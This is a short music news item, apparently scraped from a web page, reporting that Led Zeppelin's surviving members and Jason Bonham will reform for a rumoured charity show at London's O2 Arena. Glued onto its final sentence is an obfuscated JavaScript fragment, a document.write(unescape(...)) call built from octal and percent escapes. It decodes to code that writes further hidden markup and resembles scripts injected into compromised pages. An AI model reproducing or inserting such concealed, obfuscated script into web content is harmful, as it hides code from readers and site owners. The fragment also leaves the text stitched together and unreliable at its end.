Jimmy Page and Robert Plant have often played together under their own names but up until recently they have been prevented from using the hallowed name Led Zeppelin.
Bass player John Paul Jones retained a twenty five percent ownership of the name and up until now has refused to let the band reform. The other quarter is owned by drummer John Bonham's son, Jason and all four will make up the band.
The group who, along with Black Sabbath, have been instrumental in influencing nearly all strands of hard rock and heavy metal since, have not played together since their original drummer's death in 1980.
Full details of their reformation will be announced at a press conference at the O2 Arena in London tomorrow (Wednesday September 12) but the gig is rumoured to be a one off for charity held at the dome on November 26.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
